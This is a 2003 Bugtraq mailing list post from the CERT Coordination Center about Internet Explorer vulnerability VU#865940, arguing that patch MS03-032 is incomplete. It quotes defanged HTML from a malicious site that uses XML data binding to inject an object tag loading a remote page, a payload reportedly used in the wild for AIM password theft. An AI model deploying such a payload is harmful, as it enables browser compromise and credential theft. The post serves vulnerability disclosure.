Bugtraq mailing list archives
RE: [Fwd: Re: AIM Password theft] VU#865940
From: "CERT(R) Coordination Center" <cert () cert org>
Date: Wed, 24 Sep 2003 14:35:06 -0400
-----BEGIN PGP SIGNED MESSAGE----- Thor Larholm <thor () pivx com> writes:
This is just a simple exploit utilizing the Object Data vulnerability discovered by Drew Copley, coupled with the GreyMagic no-script HTML rendering as demonstrated earlier on this list and others by jelmer. Tell your user to go install MS03-032, which he obviously did not do as MS03-032 patches this vulnerability. MS03-032 was released on August 20 and you can find it at http://www.microsoft.com/technet/security/bulletin/MS03-032.asp
At the present, the patch for MS03-032 breaks one of at least three exploit techniques. The patch does not resolve the vulnerability. MS03-032 acknowledges this. I have seen several examples of this vulnerability being exploited in the wild.
www.haxr.org contains the following HTML code (with <> replaced to []): [span datasrc="#oExec" datafld="counter" dataformatas="html"][/span] [xml id="oExec"] [security] [counter] [![CDATA[ [object data=tracker.php][/object] ]]] [/counter] [/security] [/xml]
In particular, the current MS03-32 patch doesn't account for an HTML document created via XML/data binding: <http://greymagic.com/adv/gm001-ie/> The patch also does not account for an HTML document created via script: <http://www.securityfocus.com/archive/1/336616> Vulnerability Note VU#865940: <http://www.kb.cert.org/vuls/id/865940> Regards, - Art Art Manion -- CERT Coordination Center <http://www.cert.org/> <cert () cert org> +1 412-268-7090 E0 1E DF F5 FC 76 00 32 77 8F 25 F7 B0 2E 2C 27 -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBP3HlHDpmH2w9K/0VAQGBuQQAmrvGlHEXmMx48LhA2dQ/wK8XCqYaVYtD Y4FPmSvwqZ8phYKhT20Dh9sYGLWHbaJ3sfGA589MOLJwhpZ3aVlunLQ6GjLO1qje 6dab5rVGdgTNzMC87YX2E7RB6uS4K8htL0MhN4LLvbHS402QEeNOhX+Fi2lsLkyi 6uioMggI1Ms= =Jnmk -----END PGP SIGNATURE-----
Current thread:
- [Fwd: Re: AIM Password theft] Mark Coleman (Sep 23)
- <Possible follow-ups>
- RE: [Fwd: Re: AIM Password theft] S G Masood (Sep 24)
- RE: [Fwd: Re: AIM Password theft] Thor Larholm (Sep 24)
- RE: [Fwd: Re: AIM Password theft] VU#865940 CERT(R) Coordination Center (Sep 24)
- Re: [Fwd: Re: AIM Password theft] DarkKnight (Sep 24)
- Re: [Fwd: Re: AIM Password theft] jelmer (Sep 24)